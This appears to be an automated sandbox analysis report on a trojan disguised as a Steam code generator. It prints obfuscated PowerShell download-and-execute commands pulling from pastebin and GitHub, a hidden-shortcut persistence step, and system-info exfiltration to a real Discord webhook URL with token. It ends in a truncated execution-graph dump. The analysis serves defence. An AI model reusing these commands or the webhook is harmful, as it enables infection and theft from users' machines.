X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
Accept-Ranges: bytes
Date: Tue, 15 Oct 2024 13:52:57 GMT
Via: 1.1 varnish
X-Served-By: cache-dfw-kdfw8210158-DFW
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1729000377.144876,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: ee338deaaa50f889bc8818e31f2264a8a069c2f1
Expires: Tue, 15 Oct 2024 13:57:57 GMT
Source-Age: 24
2024-10-15 13:52:57 UTC | 1378 | IN | Data Ascii:
sleep 5
rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Force
sleep 5


$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
if (-Not (Test-Path $googoogaagaa)) {
rm $env:tmp\onedrivefilesync.dll -force
New-ItemPropert
2024-10-15 13:52:57 UTC | 1378 | IN | Data Ascii:
cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors

# Retrieve GPU information
$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
2024-10-15 13:52:57 UTC | 618 | IN | Data Ascii:
======================
"@
} | ConvertTo-Json

# Send the POST request to the webhook URL
try {
    Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json"
    Write-Output "Message sent successfully."
} catch {
    W


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        6192.168.2.649944172.67.19.244435576C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-10-15 13:53:03 UTC169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                        Host: pastebin.com
                                                                                                                        Connection: Keep-Alive
                                                                                                                        2024-10-15 13:53:03 UTC396INHTTP/1.1 200 OK
                                                                                                                        Date: Tue, 15 Oct 2024 13:53:03 GMT
                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        x-frame-options: DENY
                                                                                                                        x-content-type-options: nosniff
                                                                                                                        x-xss-protection: 1;mode=block
                                                                                                                        cache-control: public, max-age=1801
                                                                                                                        CF-Cache-Status: HIT
                                                                                                                        Age: 33
                                                                                                                        Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8d304b0c990d2c91-DFW
                                                                                                                        2024-10-15 13:53:03 UTC139INData Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                                                                                                        Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
2024-10-15 13:53:03 UTC | 5 | IN | Data Ascii:
0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.6 | 49952 | 185.199.109.133 | 443 | 5576 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 13:53:04 UTC | 222 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                        Host: raw.githubusercontent.com
                                                                                                                        Connection: Keep-Alive
2024-10-15 13:53:04 UTC | 901 | IN | HTTP/1.1 200 OK
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 7508
                                                                                                                        Cache-Control: max-age=300
                                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                        ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        X-Frame-Options: deny
                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                        X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Date: Tue, 15 Oct 2024 13:53:04 GMT
                                                                                                                        Via: 1.1 varnish
                                                                                                                        X-Served-By: cache-dfw-kdal2120132-DFW
                                                                                                                        X-Cache: HIT
                                                                                                                        X-Cache-Hits: 1
                                                                                                                        X-Timer: S1729000385.907727,VS0,VE1
                                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                        X-Fastly-Request-ID: a6ac80a05e96432611f85ba5ed3b7956f63f2bf4
                                                                                                                        Expires: Tue, 15 Oct 2024 13:58:04 GMT
                                                                                                                        Source-Age: 32
2024-10-15 13:53:04 UTC | 1378 | IN | Data Ascii:
sleep 5
rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Force
sleep 5


$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
if (-Not (Test-Path $googoogaagaa)) {
rm $env:tmp\onedrivefilesync.dll -force
New-ItemPropert
2024-10-15 13:53:04 UTC | 1378 | IN | Data Ascii:
,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
2024-10-15 13:53:04 UTC | 1378 | IN | Data Ascii:
,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
2024-10-15 13:53:04 UTC | 1378 | IN | Data Ascii:
1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
2024-10-15 13:53:04 UTC | 1378 | IN | Data Ascii:
cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors

# Retrieve GPU information
$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
2024-10-15 13:53:04 UTC | 618 | IN | Data Ascii:
======================
"@
} | ConvertTo-Json

# Send the POST request to the webhook URL
try {
    Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json"
    Write-Output "Message sent successfully."
} catch {
    W


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.6 | 49983 | 162.159.138.232 | 443 | 420 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 13:53:10 UTC | 311 | OUT | POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                        Content-Type: application/json
                                                                                                                        Host: discord.com
                                                                                                                        Content-Length: 301
                                                                                                                        Connection: Keep-Alive
2024-10-15 13:53:10 UTC | 301 | OUT | Data Ascii:
{
    "content":  "================================\n**user** system online\n\n**GPU:** L38XPSFZ\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC
2024-10-15 13:53:10 UTC | 1354 | IN | HTTP/1.1 204 No Content
                                                                                                                        Date: Tue, 15 Oct 2024 13:53:10 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close
                                                                                                                        set-cookie: __dcfduid=d07c03fa8afc11efa79a56017482278c; Expires=Sun, 14-Oct-2029 13:53:10 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                        x-ratelimit-limit: 5
                                                                                                                        x-ratelimit-remaining: 4
                                                                                                                        x-ratelimit-reset: 1729000391
                                                                                                                        x-ratelimit-reset-after: 1
                                                                                                                        via: 1.1 google
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1Pm%2BtHq5hXJ47cVrvEHyVG5PjRT4zHI4HN5eZLIHKdFqjMNjxMrbaBa%2Bpv2hToZMv1%2BYPobwma2lJ92an0uwrXf6VadB5zYvMJjJaZjcVdjY3h7234zK4DiVI10S"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                        Set-Cookie: __sdcfduid=d07c03fa8afc11efa79a56017482278cae5f3787c1133a8dbdc6e5cb5203af315f994a439c8055caff06d0e25330340d; Expires=Sun, 14-Oct-2029 13:53:10 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                        Set-Cookie: __cfruid=573708c6e214ff4c588e4d35ede66ee5885d1841-1729000390; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-10-15 13:53:10 UTC | 211 | IN | Data Ascii:
Set-Cookie: _cfuvid=HJrjdpnMBIgIrEtvawm9ur.H3sAwyNe9BHLEAaEzkBU-1729000390616-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8d304b37fdcf4774-DFW


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.6 | 49997 | 162.159.138.232 | 443 | 5576 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 13:53:17 UTC | 311 | OUT | POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                        Content-Type: application/json
                                                                                                                        Host: discord.com
                                                                                                                        Content-Length: 301
                                                                                                                        Connection: Keep-Alive
2024-10-15 13:53:18 UTC | 301 | OUT | Data Ascii:
{
    "content":  "================================\n**user** system online\n\n**GPU:** L38XPSFZ\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC
2024-10-15 13:53:18 UTC | 1358 | IN | HTTP/1.1 204 No Content
                                                                                                                        Date: Tue, 15 Oct 2024 13:53:18 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close
                                                                                                                        set-cookie: __dcfduid=d4fe07208afc11ef89f6de213a7abdd7; Expires=Sun, 14-Oct-2029 13:53:18 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                        x-ratelimit-limit: 5
                                                                                                                        x-ratelimit-remaining: 4
                                                                                                                        x-ratelimit-reset: 1729000399
                                                                                                                        x-ratelimit-reset-after: 1
                                                                                                                        via: 1.1 google
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2z2ObZ%2B3fAFhUTZNXxSMKavwf5KdShB7XkI5QBT8Y8d6RZ06M0TSAH%2B3Vzn3sLZqxGjgbPaeHv0aOv9cL%2BzsmTCC5z32aQr%2BVQXmvgMuGFq0jgR%2BXKUVFwzDPaLO"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                        Set-Cookie: __sdcfduid=d4fe07208afc11ef89f6de213a7abdd78cb30a80268c68886fb674b2426be957577606e9c7b16a1eb0a8f018c0b2595e; Expires=Sun, 14-Oct-2029 13:53:18 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                        Set-Cookie: __cfruid=1ecd908642a162343fd4609e9ff981ab1b45e471-1729000398; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-10-15 13:53:18 UTC | 211 | IN | Data Ascii:
Set-Cookie: _cfuvid=viP2u3SLqa7GMD0E1UD2ssRZbZZpCO9boJuS2DUQkIA-1729000398176-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8d304b67ccdf2e4e-DFW



                                                                                                                        Target ID:0
                                                                                                                        Start time:09:52:09
                                                                                                                        Start date:15/10/2024
Path: C:\Users\user\Desktop\steamcodegenerator.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\steamcodegenerator.exe"
Imagebase: 0x7ff71c050000
File size: 258'048 bytes
MD5 hash: D4F1751389516A3DFAC98551142CB153
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.3398779479.0000020C74730000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000003.2201099145.0000020C72A8E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.3398378656.0000020C72A8E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Reputation: low
Has exited: false

Target ID: 1
Start time: 09:52:09
Start date: 15/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 4
Start time: 09:52:16
Start date: 15/10/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell.exe -command start powershell -windowstyle h -args {sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)}
Imagebase: 0x7ff6e3d50000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 09:52:32
Start date: 15/10/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)
Imagebase: 0x7ff6e3d50000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 09:52:32
Start date: 15/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 9
Start time: 09:52:51
Start date: 15/10/2024
Path: C:\Windows\System32\attrib.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Imagebase: 0x7ff688dd0000
File size: 23'040 bytes
MD5 hash: 5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 10
Start time: 09:52:51
Start date: 15/10/2024
Path: C:\Windows\System32\forfiles.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Imagebase: 0x7ff75eb10000
File size: 52'224 bytes
MD5 hash: 9BB67AEA5E26CB136F23F29CC48D6B9E
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 11
Start time: 09:52:51
Start date: 15/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 12
Start time: 09:52:52
Start date: 15/10/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Imagebase: 0x7ff6e3d50000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 13
Start time: 09:52:52
Start date: 15/10/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Imagebase: 0x7ff6e3d50000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 14
Start time: 09:52:59
Start date: 15/10/2024
Path: C:\Windows\System32\forfiles.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Imagebase: 0x7ff75eb10000
File size: 52'224 bytes
MD5 hash: 9BB67AEA5E26CB136F23F29CC48D6B9E
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 15
Start time: 09:52:59
Start date: 15/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 16
Start time: 09:53:00
Start date: 15/10/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Imagebase: 0x7ff6e3d50000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 17
Start time: 09:53:00
Start date: 15/10/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Imagebase: 0x7ff6e3d50000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Execution Graph

Execution Coverage: 3.3%
Dynamic/Decrypted Code Coverage: 16.3%
Signature Coverage: 15.2%
Total number of Nodes: 447
Total number of Limit Nodes: 29
[Execution graph node/edge listing (execution_graph, 447 nodes, truncated at the end of the page) omitted as rendering residue; Windows API calls visible in the listed nodes: WinExec, SleepEx, VirtualAlloc, VirtualFree, GetModuleHandleW, IsProcessorFeaturePresent, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, GetStdHandle, GetFileType, TlsFree, LoadLibraryExW, FreeLibrary, GetProcAddress, GetLastError, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapFree]
7ff71c064848 memcpy_s 9 API calls 18851->18852 18852->18853 18853->18801 18855 7ff71c065b65 18854->18855 18856 7ff71c068a7c memcpy_s 11 API calls 18855->18856 18868 7ff71c065b9b 18856->18868 18857 7ff71c065ba3 18858 7ff71c068af4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18857->18858 18859 7ff71c065b0b 18858->18859 18859->18811 18860 7ff71c065c16 18861 7ff71c068af4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18860->18861 18861->18859 18862 7ff71c068a7c memcpy_s 11 API calls 18862->18868 18863 7ff71c065c05 19303 7ff71c065c50 18863->19303 18867 7ff71c065c3b 18871 7ff71c062074 _invalid_parameter_noinfo_noreturn 17 API calls 18867->18871 18868->18857 18868->18860 18868->18862 18868->18863 18868->18867 18870 7ff71c068af4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18868->18870 19294 7ff71c061b00 18868->19294 18869 7ff71c068af4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18869->18857 18870->18868 18872 7ff71c065c4e 18871->18872 18874 7ff71c06a37d FlsGetValue 18873->18874 18875 7ff71c06a398 FlsSetValue 18873->18875 18876 7ff71c06a38a 18874->18876 18877 7ff71c06a392 18874->18877 18875->18876 18878 7ff71c06a3a5 18875->18878 18879 7ff71c06a390 18876->18879 18928 7ff71c064e4c 18876->18928 18877->18875 18916 7ff71c068a7c 18878->18916 18893 7ff71c070f48 18879->18893 18883 7ff71c06a3b4 18884 7ff71c06a3d2 FlsSetValue 18883->18884 18885 7ff71c06a3c2 FlsSetValue 18883->18885 18887 7ff71c06a3de FlsSetValue 18884->18887 18888 7ff71c06a3f0 18884->18888 18886 7ff71c06a3cb 18885->18886 18890 7ff71c068af4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18886->18890 18887->18886 18923 7ff71c06a048 18888->18923 18890->18876 19119 7ff71c0711b8 18893->19119 18895 7ff71c070f7d 19134 7ff71c070c48 18895->19134 18900 7ff71c070fb3 18902 7ff71c068af4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18900->18902 18901 7ff71c070fc2 19148 7ff71c0712ec 18901->19148 18915 7ff71c070f9a 18902->18915 18905 
7ff71c0710be 18906 7ff71c064848 memcpy_s 11 API calls 18905->18906 18908 7ff71c0710c3 18906->18908 18907 7ff71c071119 18910 7ff71c071180 18907->18910 19159 7ff71c070a78 18907->19159 18911 7ff71c068af4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18908->18911 18909 7ff71c0710d8 18909->18907 18912 7ff71c068af4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18909->18912 18914 7ff71c068af4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18910->18914 18911->18915 18912->18907 18914->18915 18915->18827 18921 7ff71c068a8d memcpy_s 18916->18921 18917 7ff71c068ade 18940 7ff71c064848 18917->18940 18918 7ff71c068ac2 HeapAlloc 18919 7ff71c068adc 18918->18919 18918->18921 18919->18883 18921->18917 18921->18918 18937 7ff71c065484 18921->18937 18966 7ff71c069f20 18923->18966 18980 7ff71c06f8d8 18928->18980 18943 7ff71c0654c4 18937->18943 18949 7ff71c06a410 GetLastError 18940->18949 18942 7ff71c064851 18942->18919 18948 7ff71c062104 EnterCriticalSection 18943->18948 18950 7ff71c06a451 FlsSetValue 18949->18950 18955 7ff71c06a434 18949->18955 18951 7ff71c06a441 18950->18951 18952 7ff71c06a463 18950->18952 18953 7ff71c06a4bd SetLastError 18951->18953 18954 7ff71c068a7c memcpy_s 5 API calls 18952->18954 18953->18942 18956 7ff71c06a472 18954->18956 18955->18950 18955->18951 18957 7ff71c06a490 FlsSetValue 18956->18957 18958 7ff71c06a480 FlsSetValue 18956->18958 18960 7ff71c06a4ae 18957->18960 18961 7ff71c06a49c FlsSetValue 18957->18961 18959 7ff71c06a489 18958->18959 18963 7ff71c068af4 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 18959->18963 18962 7ff71c06a048 memcpy_s 5 API calls 18960->18962 18961->18959 18964 7ff71c06a4b6 18962->18964 18963->18951 18965 7ff71c068af4 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 18964->18965 18965->18953 18978 7ff71c062104 EnterCriticalSection 18966->18978 19014 7ff71c06f890 18980->19014 19019 7ff71c062104 EnterCriticalSection 19014->19019 19120 7ff71c0711db 19119->19120 
19121 7ff71c0711e5 19120->19121 19174 7ff71c062104 EnterCriticalSection 19120->19174 19123 7ff71c071257 19121->19123 19126 7ff71c064e4c BuildCatchObjectHelperInternal 47 API calls 19121->19126 19123->18895 19128 7ff71c07126f 19126->19128 19130 7ff71c0712c2 19128->19130 19131 7ff71c06a36c 52 API calls 19128->19131 19130->18895 19132 7ff71c0712ac 19131->19132 19133 7ff71c070f48 67 API calls 19132->19133 19133->19130 19175 7ff71c064868 19134->19175 19137 7ff71c070c7a 19139 7ff71c070c8f 19137->19139 19140 7ff71c070c7f GetACP 19137->19140 19138 7ff71c070c68 GetOEMCP 19138->19139 19139->18915 19141 7ff71c068b30 19139->19141 19140->19139 19142 7ff71c068b7b 19141->19142 19143 7ff71c068b3f memcpy_s 19141->19143 19145 7ff71c064848 memcpy_s 11 API calls 19142->19145 19143->19142 19144 7ff71c068b62 HeapAlloc 19143->19144 19147 7ff71c065484 std::_Facet_Register 2 API calls 19143->19147 19144->19143 19146 7ff71c068b79 19144->19146 19145->19146 19146->18900 19146->18901 19147->19143 19149 7ff71c070c48 49 API calls 19148->19149 19150 7ff71c071319 19149->19150 19151 7ff71c07146f 19150->19151 19153 7ff71c071356 IsValidCodePage 19150->19153 19158 7ff71c071370 memcpy_s 19150->19158 19152 7ff71c058d90 _invalid_parameter_noinfo_noreturn 8 API calls 19151->19152 19154 7ff71c0710b5 19152->19154 19153->19151 19155 7ff71c071367 19153->19155 19154->18905 19154->18909 19156 7ff71c071396 GetCPInfo 